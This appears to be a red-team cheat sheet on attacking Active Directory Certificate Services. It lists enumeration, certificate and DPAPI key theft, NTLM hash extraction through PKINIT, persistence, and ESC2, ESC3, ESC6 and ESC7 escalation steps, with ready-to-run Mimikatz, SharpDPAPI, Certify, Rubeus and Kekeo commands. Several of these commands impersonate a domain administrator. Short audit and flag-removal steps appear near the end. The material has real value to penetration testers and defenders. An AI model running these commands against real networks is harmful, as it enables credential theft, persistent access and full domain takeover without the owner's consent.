AD CS Abuse
Active Directory Certificate Services

Glossary

  • AD CS 👉🏻 Active Directory Certificate Services
  • CA 👉🏻 Certification Authority
  • EKU 👉🏻 Extended Key Usage
  • SAN 👉🏻 Subject Alternative Name (subjectAltName)
  • CSR 👉🏻 Certificate Signing Request
  • CES 👉🏻 Certificate Enrollment Web Service
  • CAPI 👉🏻 CryptoAPI
  • CNG 👉🏻 Cryptography API: Next Generation
EKU OIDs that can enable certificate authentication:
Description
OID
Client Authentication
1.3.6.1.5.5.7.3.2
PKINIT Client Authentication
1.3.6.1.5.2.3.4
Smart Card Logon
1.3.6.1.4.1.311.20.2.2
Any Purpose EKU
2.5.29.37.0
Subordinate CA certificate
No EKU set

Enumerate

Enumerate AD Enterprise CAs and their settings with PowerShell:
1
PS > $CAs = Get-ADObject -LDAPFilter '(objectCategory=pKIEnrollmentService)' -SearchBase "CN=Configuration,DC=megacorp,DC=local"
2
PS > $CAs
Copied!
Enumerate AD Enterprise CAs with CME:
1
PS > cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M adcs
Copied!
Get list of certificate template names:
1
PS > $CATemplateNames = Get-ADObject $CAs[0].DistinguishedName -Properties certificatetemplates | Select-Object -ExpandProperty certificatetemplates
2
PS > $CATemplateNames
3
Or
4
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd!' -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=megacorp,DC=local' --attrs dn,dnshostname
5
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd!' -m custom --filter '(distinguishedName=CN=CA01,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=megacorp,DC=local)' --base 'CN=Configuration,DC=megacorp,DC=local' --attrs certificateTemplates
Copied!
Enumerate AD Enterprise CAs with certutil from a domain-joined machine:
1
Cmd > certutil.exe -config - -ping
2
Cmd > certutil.exe -TCAInfo [-v]
Copied!

Hunt for Certificates

Export Certificates (THEFT1)

Export a certificate from user's context.
With certmgr:
  • Run → certmgr.msc → Action → All Tasks → Export ...
With PowerShell:
1
PS > Export-PfxCertificate -Password (Read-Host -AsSecureString -Prompt 'Password') -Cert (Get-Item -Path Cert:\LocalMachine\My\<CERT_THUMBPRINT>) -FilePath cert.pfx -Verbose
Copied!
1
Cmd > .\CertStealer.exe -export pfx <CERT_THUMBPRINT>
Copied!
If the private key is non-exportable, use Mimikatz's crypto::capi (to patch CAPI in current process) or crypto::cng (to patch lsass.exe memory):
1
Cmd > .\mimikatz.exe "crypto::capi" "crypto::certificates /export" "exit"
Copied!

DPAPI User Keys (THEFT2)

Decrypt a domain user's masterkey with domain's backup key with Mimikatz:
1
Cmd > .\mimikatz.exe "dpapi::masterkey /in:C:\path\to\masterkey /rpc" "exit"
Copied!
Decrypt masterkey if user's plaintext password is known with Mimikatz:
1
Cmd > .\mimikatz.exe "dpapi::masterkey /in:C:\path\to\masterkey /sid:<ACCOUNT_SID> /password:Passw0rd!" "exit"
Copied!
Simplify the process with SharpDPAPI providing it a file with one or more {GUID}:SHA1 masterkey mappings (will output a .pem file):
1
Cmd > .\SharpDPAPI.exe certificates /mkfile:C:\Temp\mkeys.txt
Copied!

DPAPI Machine Keys (THEFT3)

It's not possible to decrypt machine keys using the domain's DPAPI backup key, so the adversary can use the DPAPI_SYSTEM LSA secret on the system which is accessible only by the SYSTEM user:
1
# While elevated
2
Cmd > .\SharpDPAPI.exe certificates /machine
Copied!
After converting the output to .pfx and if the appropriate EKU scenario is present, the adversary can use that .pfx for domain authentication as the computer account (see PERSIST2).

Search for Certificate Files (THEFT4)

Find certificate files lying around with Seatbelt:
1
Cmd > .\Seatbelt.exe "dir C:\ 10 \.(pfx|pem|p12)`$ false"
2
Cmd > .\Seatbelt.exe InterestingFiles
Copied!
Some other certificate-related file extensions:
File Extension
Description
.key
The private key.
.crt/.cer
The certificate.
.csr
Signing request file. Does not contain certificates or keys.
.jks/.keystore/.keys
Java Keystore. May contain certificates + private keys used by Java apps.
List EKUs for a certificate with PowerShell:
1
PS > $CertPath = "C:\Users\snovvcrash\cert.pfx"
2
PS > $CertPass = "Passw0rd!"
3
PS > $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($CertPath, $CertPass)
4
PS > $Cert.EnhancedKeyUsageList
Copied!
Parse .pfx with certutil:
1
Cmd > certutil.exe -dump -v cert.pfx
Copied!
Correlate a certificate with a CA thumbprint on the host and in AD:
1
# Get cert's thumbprint
2
PS > $CertPath = "C:\Users\snovvcrash\cert.p12"
3
PS > $CertPass = "Passw0rd!"
4
PS > $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($CertPath, $CertPass)
5
PS > $Cert.Thumbprint
6
7
# Match it with CA certs' thumbprints trusted by the current host
8
Cmd > .\Seatbelt.exe -q CertificateThumbprints
9
10
# Match it with CA certs' thumbprints from AD
11
Cmd > .\Certify.exe find /quiet
Copied!

Steal NTLM via PKINIT (THEFT5)

Request NTLM hash when the account is authenticated with a TGT through PKINIT with Kekeo:
1
Cmd > .\kekeo.exe "tgt::pac /caname:CA01 /domain:megacorp.local /subject:snovvcrash /castore:current_user" "exit"
Copied!

Persistence via Certificates

User Persistence (PERSIST1)

Find certificate templates available for enrollment for the current user:
1
Cmd > .\Certify.exe find /clientauth
Copied!
Search for any template that allows domain authentication (a stock published template that allows client authentication is the User template).
Request a new certificate for enrolling current user context:
1
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User
Copied!
This will output a certificate and private key in .pem. To convert it to .pfx compatible with Rubeus do:
1
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Copied!
After that an adversary can upload it to target and use Rubeus to request a valid TGT, for as long as the certificate is valid (default certificate lifetime is one year):
1
Cmd > .\Rubeus.exe asktgt /user:snovvcrash /certificate:C:\Temp\cert.pfx /password:Passw0rd!
Copied!
This approach will work even if the user changes their password. Combined with the THEFT5 technique, an adversary can also persistently obtain the account's NTLM hash.

Machine Persistence (PERSIST2)

Same as for PERSIST1 but requesting a certificate for enrolling current machine context:
1
# While elevated
2
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:Machine /machine
Copied!
With access to a machine account certificate an adversary can use S4U2Self to obtain a Kerberos ticket to any service on the host (see RBCD Abuse) or generate a silver ticket.

Certificate Renewal

  • Certificate template validity period - determines how long an issued certificate can be used.
  • Certificate template renewal period - determines a window of time before the certificate expires where an account can renew it from the issuing certificate authority.
An adversary can renew the compromised certificate before the validity period expires, and so that extend their access to AD without requesting additional ticket enrollments.

Domain Escalation via Certificates

Modifiable SAN + Any Purpose EKU (ESC2)

Condition: the vulnerable certificate template allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0).
Find template with this misconfiguration:
1
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
Copied!
Request a certificate specifying the /altname as a domain admin like in ESC1.

Agent Certificate + Enroll on Behalf of Another User (ESC3)

Conditions:
  1. 1.
    A template allows a low-privileged user to use an enrollment agent certificate.
  2. 2.
    Another template allows a low privileged user to use the enrollment agent certificate to request a certificate on behalf of another user, and the template defines an EKU that allows for domain authentication.
1. Request an enrollment agent certificate:
1
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:Vuln-EnrollAgentTemplate
Copied!
2. Request a certificate on behalf of another to a template that allow for domain authentication:
1
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User /onbehalfon:MEGACORP\ITAdmin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!
Copied!

Vulnerable PKI Object ACEs (ESC5)

...

EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6)

If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
This means that an adversary can enroll in any template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) and obtain a certificate that allows to authenticate as a domain admin or any other active user/machine.
Discover with certutil:
1
Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
2
Or
3
Cmd > reg.exe query \\CA01.megacorp.local\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA01\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags
Copied!
Discover with Certify:
1
Cmd > .\Certify.exe find
Copied!
To abuse request a certificate specifying an /altname with any template that allows for domain auth (e.g., the default User template which normally doesn't allow to specify alternative names):
1
Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User /altname:DomAdmin
Copied!
This setting can be set with domain admin's privileges like this (dangerous, do not do this!):
1
Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -setreg "policy\EditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2
Copied!
Remove this setting:
1
Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2
Copied!

Vulnerable CA ACEs (ESC7)

Enumarate CA ACEs with Powershell PSPKI:
1
PS > Install-Module -Name PSPKI
2
PS > Import-Module PSPKI
3
PSPKI > Get-CertificationAuthority -ComputerName CA01.megacorp.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
Copied!
ManageCA and ManageCertificates rights translate to the "CA Administrator" and "Certificate Manager" ("CA Officer") respectively.
The "CA Administrator" role allows to set the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (see ESC6):
1
# Check before setting the flag
2
Cmd > hostname
3
DC01
4
Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
5
6
# Invoke SetConfigEntry
7
PS > "$(hostname) : $(whoami)"
8
WS01 : megacorp\CertAdmin
9
PSPKI > $configReader = New-Object SysadminsLV.PKI.Dcom.Implementation.CertSrvRegManagerD "CA01.megacorp.local"
10
PSPKI > $configReader.SetRootNode($true)
11
PSPKI > $configReader.GetConfigEntry("EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
12
1114446
13
PSPKI > $configReader.SetConfigEntry(1376590, "EditFlags", "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
14
15
# Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)
16
Cmd > hostname
17
DC01
18
Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
Copied!
The "Certificate Manager" role allows to remotely approve pending certificate requests which can by used by an adversary to subvert the "CA certificate manager approval" protection:
1
# Request a certificate that requires manager approval with Certify
2
PS > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:ApprovalNeeded
3
...
4
[*] Request ID : 1337
5
6
# Approve a pending request with PSPKI
7
PSPKI > Get-CertificationAuthority -ComputerName CA01.megacorp.local | Get-PendingRequest -RequestID 1337 | Approve-CertificateRequest
8
9
# Download the issued certificate with Certify
10
PS > .\Certify.exe download /ca:CA01.megacorp.local\CA01 /id:1337
Copied!

Audit

1
PS > Get-WindowsCapability -Online -Name "Rsat.*" | where Name -match "CertificateServices|ActiveDIrectory" | Add-WindowsCapability -Online
2
PS > cd PSPKIAudit
3
PS > Get-ChildItem -Recurse | Unblock-File
4
PS > Import-Module .\PSPKIAudit.psm1
5
PS > Invoke-PKIAudit -CAComputerName CA01.megacorp.local
Copied!

Misc

Parse .pfx with PowerShell:
1
PS > $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]([System.Convert]::FromBase64String("<BASE64_PFX_CERT>"))
2
PS > $cert | select *
Copied!

Tools

Certify

Search for vulnerable certificate templates:
1
Cmd > .\Certify.exe find /vulnerable
Copied!
Last modified 22d ago